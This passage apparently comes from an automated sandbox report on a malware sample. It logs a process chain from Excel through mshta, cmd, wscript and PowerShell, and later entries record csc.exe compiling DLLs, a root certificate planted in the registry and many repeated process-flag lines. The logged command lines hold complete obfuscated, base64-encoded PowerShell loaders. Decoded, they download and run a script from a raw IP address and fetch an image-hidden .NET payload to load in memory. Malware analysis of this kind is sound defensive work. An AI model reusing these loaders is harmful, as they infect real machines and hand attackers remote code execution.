2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $AngelJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A022D push eax; iretd 8_2_000007FE899A0241
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A00BD pushad ; iretd 8_2_000007FE899A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A2243 pushad ; ret 8_2_000007FE899A2261

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
